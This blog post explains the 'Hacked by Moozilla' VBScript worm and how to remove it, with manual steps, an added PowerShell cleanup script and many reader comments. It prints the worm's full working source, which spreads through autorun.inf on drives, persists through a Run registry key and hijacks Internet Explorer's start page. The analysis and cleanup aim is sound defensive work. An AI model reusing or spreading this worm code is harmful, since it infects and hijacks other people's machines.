Hacked by Moozilla
Mar 20th, 2007 by Karthick
Recently, I have seen many instances of this browser hijack on many machines. People are going nuts with this infection, and here I am nearing a solution to wipe it off the infected machines.
Browser and Explorer Hijack?
Yes. IE gets hijacked after the infection: whenever IE is opened, the home page is re-routed to http://www.lastchaos.in.th/ .
Apart from the browser hijack, it also hacks Windows Explorer. On an infected machine, a left double-click will not open the drives in Windows Explorer; right-clicking and choosing Open or Explore still works. So it hijacks both IE and Windows Explorer.
File and Location
The file that does this hack is named IISDLL.dll.vbs, and it is located at C:\IISDLL.dll.vbs and C:\Windows\IISDLL.dll.vbs.
The file has the read-only attribute set and cannot be modified as it is. You need to change the attribute before making changes to the file.
Mode of Infection?
Going by the script, the mode of infection is through flash or thumb drives. Be careful with yours as machines are rapidly infected with this file.
Solution?
Have tried cleaning the machines with all AV software I could think of and nothing seems to work. I am planning to write a counter script to nullify this one. Till then watch this space for a proper solution.
Where is the script?
If your machine is infected, you can locate the file, right-click it and open it for editing in Notepad. If your machine is not infected but you are curious to know what the script does, see below.
IISDLL.dll.vbs
‘My name is Sukorn test script for bootsecter
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe IISDLL.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\IISDLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\IISDLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\IISDLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\IISDLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\IISDLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\IISDLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\IISDLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by MOOzilla”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”,”http://www.lastchaos.in.th/”
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
Update
What does this Moozilla do?
The Moozilla hijack is not a malicious program designed to damage the machine. It is a small Windows VBScript that hijacks the start page of your browser and points it to a site in Thailand. The autorun.inf file gets copied to a flash drive from an infected machine. When that flash drive is inserted into another machine, the autoplay feature runs autorun.inf, which copies the IISDLL.dll.vbs and autorun.inf files to all the drives except A:\ . Maybe the script writer likes floppies very much.
I have removed the Hacked by Moozilla browser hijacker from my machine.
Here are the manual removal instructions. Watch this space for an automated script to remove the hijack off the machine.
Disclaimer
The solution given here worked for me, and it may or may not work for you. In no way am I responsible if anything happens to your machine after following the steps given below. If the solution helped you, leave a comment below, which will make me smile and add a day to my lifetime.
You can leave a comment if it did not work, but show some courtesy. I don’t want blood oozing out of my ears after reading your comments.
Manual Removal Instructions for Moozilla browser hijack
1. Start Windows in Safe Mode. Read the instructions on how to start Windows in Safe Mode.
2. Remove any USB storage devices that are plugged in, such as flash or thumb drives.
3. Open My Computer and look for the number of drives you have. You may have around 3 to 5 drives apart from the A:\ (if you have floppy) or an optical drive (CD or DVD drives).
4. Each drive will be marked by a letter such as E:, F:, etc.
To make the computer show hidden files and folders, click Tools in My Computer, click Folder Options and then click View. In the series of check boxes and radio buttons, do the following three things.
a. Click Show hidden files and folders.
b. Uncheck the box Hide extensions for known file types.
c. Uncheck the box Hide Protected Operating system files (Recommended).
5. Click Start and click Run. Type C:\ and hit Enter.
6. Look for the files named autorun.inf and IISDLL.dll.vbs. Select them one by one and press Shift+Delete.
Navigate to the Windows folder under the C:\ drive, look for the same files and Shift+Delete them.
7. In the same way, follow the steps for all the drives listed under My Computer.
8. Click Start and click Run. Type regedit and click OK. This will open the registry editor.
9. Back up the registry before making any changes to it, as a wrong change can have dangerous consequences for the machine. Read how to back up the Windows registry.
10. Navigate to the key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ and delete Start Page on the right hand side.
Navigate to the key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ and delete Window Title on the right hand side.
Navigate to the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and delete MS32DLL on the right hand side.
11. Restart the machine and open IE and Windows Explorer to see that Moozilla is gone. Enjoy!
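The manual steps above, as an added PowerShell example (it is not the author's promised script and not part of the original post): it reports the files and registry values that the IISDLL.dll.vbs script creates, and deletes them only when run with -Remove. The variable names and the -Remove switch are this example's own; it assumes an elevated session and looks only at the current user's HKCU hive.

```powershell
# Added example, not the author's script. Reports the indicators named in this post;
# pass -Remove to delete them. Run elevated and in Safe Mode (step 1): while the worm
# runs from a non-removable drive, its loop rewrites files and values every 200 seconds.
param([switch]$Remove)

$worm   = 'IISDLL.dll.vbs'
$files  = @()
$values = @()

# Steps 5-7: the root of every drive, plus the Windows folder.
$roots = @(Get-PSDrive -PSProvider FileSystem | ForEach-Object { $_.Root }) + "$env:windir\"
foreach ($root in $roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }   # drive with no media
    $vbs = Join-Path $root $worm
    $inf = Join-Path $root 'autorun.inf'
    if (Test-Path -LiteralPath $vbs) { $files += $vbs }
    # Flag autorun.inf only when it launches the worm; vendor media ship legitimate ones.
    if ((Test-Path -LiteralPath $inf) -and
        (Select-String -LiteralPath $inf -SimpleMatch $worm -Quiet)) { $files += $inf }
}

# Step 10: the three values the script writes. Each is matched against the worm's
# own data, so a Start Page the user set themselves is left alone (a narrower test
# than the manual steps, which delete the values unconditionally).
$ieMain = 'HKCU:\Software\Microsoft\Internet Explorer\Main'
$checks = @(
    @{ Key = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'; Name = 'MS32DLL'; Like = "*$worm*" },
    @{ Key = $ieMain; Name = 'Window Title'; Like = 'Hacked by MOOzilla*' },
    @{ Key = $ieMain; Name = 'Start Page';   Like = '*lastchaos.in.th*' }
)
foreach ($c in $checks) {
    $name  = $c.Name
    $props = Get-ItemProperty -Path $c.Key -Name $name -ErrorAction SilentlyContinue
    if ($props -and ($props.$name -like $c.Like)) { $values += $c }
}

# Files first, then registry, so nothing is left on disk to re-create the Run entry.
foreach ($f in $files) {
    "FILE   $f"
    # -Force is needed: the worm sets attributes 39 (read-only, hidden, system, archive).
    if ($Remove) { Remove-Item -LiteralPath $f -Force }
}
foreach ($v in $values) {
    "VALUE  $($v.Key)\$($v.Name)"
    if ($Remove) { Remove-ItemProperty -Path $v.Key -Name $v.Name }
}
if (-not $files -and -not $values) { 'No indicators from this post were found.' }
```

Run it once without -Remove to review what it found, and again on every flash drive before plugging that drive into a cleaned machine.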
we want a simpler solution for this problem
Hello Mr.Raghavan,
I am working on the simpler solution and will post the script once it is ready. Please wait till then.
AMAZING solution for this problem…..thanks man!!!…iam free from HACKED BY MOOZILLA…
I DID THE SAME THING BUT NOTHING HAPPENED WHEN I SEARCH FOR THAT FILE IISSDLL.dll.vbs IN SEARCH I DON’T FIND THAT FILE. BUT STILL I GET HACKED BY MOOZILLA
I tried to delete that files it’s not get deleted
Thanks mate. Ur solution worked.
But in all my drives I found only autorun.inf & not ISSDLL.dll.vbs.. So I could delete only autorun.inf…
Also in my registry I found Start Page & Window Title in the location u gave & deleted them but could’nt find MS32DLL in the location u gave… So I searched for MS32DLL in my registry, found it in a different location & deleted it..
Restarted my PC & now I’m free from Moozilla…
Once again thanks…
Thanks.. it worked..
Prasanna , Harish K and Saraswathy,
Happy that it worked.
Francis , Karthik Verma,
Please try it in safe mode and go through my instructions carefully. It will work. Patience pays.
What will happen if i delete the total script while i edit the script with notepad?
um….i can’t find the files, but i found the registry entries…
Is it better to just edit those entries, or just delete them?
hi there
i had this problem with my iexplorer… for long
so i switched to firefox … there i made it the default browser (and worked for few days…)
now im back in i explorer and found the problem is no more there
this is true and i dont know whether that will pop up again…
for now it is ok
but i can not open my pendrive double clicking!???
i want some suggestion on a problem free browser…. recommend please
Hi chief !!!!
Super solution…
Moozilla is gone…
Thanks a lot
May you be well
Thank u
Regards,
Krish
(skpgreen25@gmail.com)
Hey, i tried the solution given, but it just returns back after a few days, now what to do?
Hi. I did all the above said procedure but when I reached the regedit part, my system says that it has been disabled by the administrator and I cannot enter the registry. I am the administrator of the machine. How do I proceed? Thanks
Yo! man…awsum trick!! awaitin 4 ur script for IISDLL.dll.vbs removal!
my system got rectified by this problem.
Abhi
What Man I Can’t remove “iisdll.dll.VBS”
Pls Tell Clear Solution
same problem but it is rhetoric. please give a permanent solution atleast for windows xp sp2. i am using windows xp 9 in 1
hurry up
i have done all thing………and then formatted now my system is ok…….but in single drive its there…one disk i am not able to open……ok where to delete the MS32DLL file please tell the path…..clearly.please……….
@ Tushar,
That's a good question. Maybe you can try that.
@ balaji,
Problem free browser? You already have one. Firefox is one good browser and the latest IE 7.0 is also ok.
@ Krishna Prasad S , Pawan , Abhimanyu, Husain,
I am happy that my solution fixed the issue. Your comments encourage me to write posts like this.
@ Lakshmi, Ravikumar.S , alex , prasath,
This solution worked for me and lot of others too. So, please go through the instructions one by one and it should work. Remember that patience is the key when supporting or troubleshooting computer problems.
@ Anant,
try it in safe mode.
how to block this from further infected? As i use my flash drive, it is got infected again….
i tried to shift+delete autorun.inf and ISSDLL.dll.vbs from my C and D drives like you said i should, but these files will still be in my com when i restart, and MOOzilla will still be there. how… ??
it’s ok i managed to get rid of it! thanks so much!!
Thanks Kathick,
Every Thing Fine now.
very good work.
good solution and root cause
Brilliant, Thank you.
Brilliant, Thank you
thanks…
Hi,
i am unable to locate the Window Title in the regedit. could trace start page there. Hey but if I have understood right. These steps will tackle only the IE related issue. What about the “C” related issue: can’t open by double click.
Thanks,
Shree Harsha G P
HI GEE
Really!!! wonderful solution, many thanks & Thanks
Thanks karthi… I successfully removed MOOZILLA from my browser with ur detailed procedure… But still the autoplay option is existing, could u provide some suggestions to remove that…
Thanks!! That worked….
Sir,
i cannot see some folders ,in folder option if i click the, so hidden files it is not working how to rectify this
regards
Mahes
hi karthic thank u . it is successfully working on mypc.
Hi Karthick,
Thanks. It worked for me. I am now free from hacked by moozilla. Once again thanks. Can you help me to remove a trojan: new malware.j the exe file name is svchest.exe.
HI karthick.. nice to know that it has worked for many. Id like to know what is wrong with “viewing files that are hidden in C drive”, even after I had toggled off to view them. My quest to search ‘n destroy the .vbs worm is not working on this particular PC. The symptoms are : “Autoplay on right click” in C, D, and F drives, “Hacked by Moozilla”
“Show Hidden files not working” and probably things i might have missed. It’d be great if you can let me know how to get rid of this. Thanks…
Hi man,
I’ve faced the same problem and have recovered already. Avast! Home edition works fine to remove the virus but you need to run it through another machine and attach the infected drive. While this (and a few more) infections were active, I was totally unable to even install any anti virus on my machine. When I tried, the installation was getting closed automatically.
I’ve come to this page because one of my system running Windows 2003 Enterprise Server 64-bit edition have got infected by this script and this happened because I tried to access the hard drives of this server from infected machine using admin rights and my anti virus was running outdated virus definitions. As soon as I updated my McAfee Virus Scan 8.0i Enterprise with latest virus definitions, It identified the script and removed it. Though, I need to remove the registry entries manually.
But, unfortunately, my server is not fine. I am unable to access and see network connections. When I diagnose further, I found that many other services could not start. I am still in search for the solution.
But, after all, your description for the cause “Hacked by MOOzila” is very clear and I appreciate you contribution.
Sudesh Kantila
[Network Administrator]
SECS, SIKAR (INDIA)
Karthik
In my computer, in the folder options, if set to see the hidden files it will automatically go back to the previous position, i.e., even after check marking show hidden files and folders we cannot see them. And regedit, msconfig, gpedit all are disabled.
What can I do ………
Nice Site!
Hey Karthick, could you answer this please?
Whats happens when we run our computer in safe mode? does anything on our computer delets or starts behaving out of normal? and next time we turn on the computer can we run the computer in the normal mode? What is rebooting the computer?
Thank you
Best Regards~
Pintoleite
hi Karthik
thanks a ton… i have removed hacked by moozilla finaly with your help…thanks again…
it realy works
There is an other problem that comes along with this, all folder duplicates its self with another file name similar to it with an .exe extension. for example when we go into a folder named newfolder we can find another folder with the name newfolder.exe.
And also the virus has affected my W810i cell phone. Can anyone give me a solution to remove it?.
Hi thanks man i waz sufferin from this prob for long time …….got a solution..Thanks
Please give u r mail id
Hi Karthick,
Awesome Solution….Both the problems were a real pain while I tried opening all the drives on double click or using the enter button or tried opening IE 7.0…Your suggestion worked perfectly…And for those who have trouble fixing this issue…please try once again and look at the solution and trying implementing it properly. Initally I thought I had done it perfect…But alas, I ignored silly mistakes…So once again read the solution carefully. Does not matter if one of the files are missing in hidden folders like what Karthick said…implement the procedure over the rest of the files that you can locate…
thank you very much……..
i solved my problem “cannot find script c:\IIDLL.dll.vbs”
thanku very much


u are great
i had done as u said and i am amazed to see that the error has gone
once again i appreciate u
Karthick,
i am surprised that your solution worked with so many and no one came up with a problem like mine. Would you have some advise????
The folder options doesn't show up on the Tools menu, the *.vbs files don't appear anywhere and the command prompts/ regedit aren’t working. i formatted and reinstalled the OS, and the folder option came back on. But the first time I used IE, the hacked… by mozilla … lastchaos, came back and the folder option has disappeared again.
Worked very well thanks for the instructions
If you don’t remove the autorun.inf from the USB, it’ll come back the moment you put it in. Make sure you delete *all* copies of autorun.inf from your computer, USB drives, MP3 players, cameras, etc first, BEFORE running the regedit section.
@karthick, you reformatted your computer and that fixed it up, but then put your USB drive in, and reinstalled the virus.
@kiron, you reformatted your computer and that fixed it up, but then put your USB drive in, and reinstalled the virus.
Oh, and it’s an awsome code for what it does…
*note*, you don’t need to remove the .vbs if you can’t, as long as the autorun is gone.
Hi friends,
Keep right click always to open flash drives, it will prevent to execute the auto play option and free from IISDLL virus…..
Thanks. It the process of doing this much easier than what it appears to be. It is absolutely safe and hasslefree and Hacked by MOOzilla goes for ever.
Simply superb solution.
Hi Karthick
I tried with Ur solution which i performed manually but it is still that problem is coming up hacked by MOozilla, what i need to do please reply immediately.
bye
Sunil
Thanks a ton man… u rock…
I cant go after your solution aftr the Point no:5.can you provide a flow chart with easy accesss.it will be very helpful.it’s in your hands to make my PC free from moozilla.
Karthick,
i cant find the file which is(autorun.inf and ISSDLL.dll.vbs.)
where to find this
Hey Brother
Thanks a lot for the solution provided. It did the miracle
thanks a lot karthick! i was struggling to get rid of this moozilla and finally i got the solution from ur site. it was really very helpful. thank u.
super super super tq tq tq grt grt grt
sir
u r ginius i respect u do make a help everytime
u r really good plz send any thing intrested to my email
again u r good
Hi Karthik,
How are you i am also having the same problem but i can open the drives with left click.but in IE it shows Hacked by Moozilla.
Wat is the reason behind.Pls give a solution i got my PC just one month ago.It really terribles me
Thanks a lot…
But can u tell me how to remove the “Autoplay” from the right-click menu for drives……
but still im no longer getting redirected.should i do any thing abt it?if so what?
Good work.
Thanks a Ton.
Worked for me
thanks,
it solved my problem
hi
thanks
worked for me
Hi Karthick,
Your solution worked…thanks
Yousuff
THNKS IT WORKED….U CAN USE UNLOCKER SOFTWARE IF ITS NOT GETTING DELETED….
Thanks a lot, it really works
see for how many days
COuld you please let me know the source from where we get this virus so that we may take care of the same.